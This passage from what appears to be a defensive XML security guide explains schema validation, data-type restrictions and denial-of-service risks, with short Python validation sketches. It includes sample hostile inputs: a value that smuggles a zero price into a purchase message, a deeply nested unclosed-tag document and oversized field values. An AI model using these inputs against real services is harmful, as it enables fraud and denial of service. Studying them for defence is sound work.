  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to open a new, empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption, some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered the result valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, an attacker who provides a negative number could produce a negative total, crediting the user’s account instead of charging it. To avoid this logical vulnerability, use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;. &lt;br /&gt;
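&lt;br /&gt;
The arithmetic behind this logic flaw can be sketched in Python. This is a minimal illustration rather than code from any real application: the helper name &amp;lt;tt&amp;gt;order_total&amp;lt;/tt&amp;gt; and the sample values are assumptions made for this example.&lt;br /&gt;

```python
from decimal import Decimal


def order_total(price, quantity):
    # Hypothetical helper: computes price*quantity exactly as described above.
    return Decimal(price) * int(quantity)


# A regular purchase charges the customer.
regular = order_total('10', '1')

# xs:integer accepts -5, so the total becomes a credit instead of a charge.
malicious = order_total('10', '-5')

print(regular, malicious)
```

A schema that declares the quantity as a positive integer would reject the second message before this calculation runs.&lt;br /&gt;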
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that these data types are commonly used for elements that should only ever hold real numbers, such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
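With this schema, a price set to Infinity or NaN will not reach the application and trigger errors there, because these values are not valid for the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; data type and the document is rejected. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;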
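&lt;br /&gt;
The same concern applies to application code that parses numbers on its own. The following Python sketch assumes a hypothetical helper named &amp;lt;tt&amp;gt;is_plain_number&amp;lt;/tt&amp;gt;. It relies on the fact that the built-in &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; constructor accepts the special values, so they must be filtered out explicitly.&lt;br /&gt;

```python
import math


def is_plain_number(text):
    # Hypothetical check: reject the special values that xs:decimal also rejects.
    return math.isfinite(float(text))


# float() parses all four strings; only the first one is a finite number.
for candidate in ['9.99', 'INF', '-INF', 'NaN']:
    print(candidate, is_plain_number(candidate))
```

This check only filters the special values. It does not reproduce the full lexical rules of &amp;lt;tt&amp;gt;xs:decimal&amp;lt;/tt&amp;gt;.&lt;br /&gt;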
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for an SSN.&lt;br /&gt;
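&lt;br /&gt;
An application can apply the same expression as a second line of defense. The sketch below is an assumption about how that might look in Python, with a hypothetical helper named &amp;lt;tt&amp;gt;is_valid_ssn&amp;lt;/tt&amp;gt;. It uses &amp;lt;tt&amp;gt;re.fullmatch&amp;lt;/tt&amp;gt; because an XML Schema pattern must match the entire value.&lt;br /&gt;

```python
import re

# Same expression as the xs:pattern facet above.
SSN_PATTERN = re.compile(r'[0-9]{3}-[0-9]{2}-[0-9]{4}')


def is_valid_ssn(value):
    # fullmatch mirrors XML Schema, where a pattern must match the whole value.
    return SSN_PATTERN.fullmatch(value) is not None


print(is_valid_ssn('123-45-6789'))
print(is_valid_ssn('123-45-67890'))
```

Using a partial match instead of a full match would accept values with extra leading or trailing characters.&lt;br /&gt;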
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Not defining a maximum number of occurrences can expose the application to extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
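The kind of test suggested above can be sketched in Python. This is only an illustration, not part of the original example: the limit &amp;lt;tt&amp;gt;MAX_BUY_ELEMENTS&amp;lt;/tt&amp;gt; and the helper names are hypothetical, and the document is built in memory with the standard &amp;lt;tt&amp;gt;xml.etree.ElementTree&amp;lt;/tt&amp;gt; module rather than received from a client:&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

# Hypothetical application-level limit; choose a value that fits the workload.
MAX_BUY_ELEMENTS = 1000


def build_operation(count):
    """Build an in-memory operation document holding `count` buy elements."""
    root = ET.Element("operation")
    for i in range(count):
        buy = ET.SubElement(root, "buy")
        ET.SubElement(buy, "id").text = str(i)
        ET.SubElement(buy, "price").text = "10.00"
        ET.SubElement(buy, "quantity").text = "1"
    return root


def exceeds_limit(root, limit=MAX_BUY_ELEMENTS):
    """Return True when the document carries more buy elements than allowed."""
    return len(root.findall("buy")) > limit


small = build_operation(10)
large = build_operation(50_000)
print(exceeds_limit(small))     # False
print(exceeds_limit(large))     # True
print(len(ET.tostring(large)))  # size in bytes of the serialized document
```

Because this check runs only after the whole tree is in memory, it complements rather than replaces a bounded &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; value in the schema.&lt;br /&gt;
&lt;br /&gt;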
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
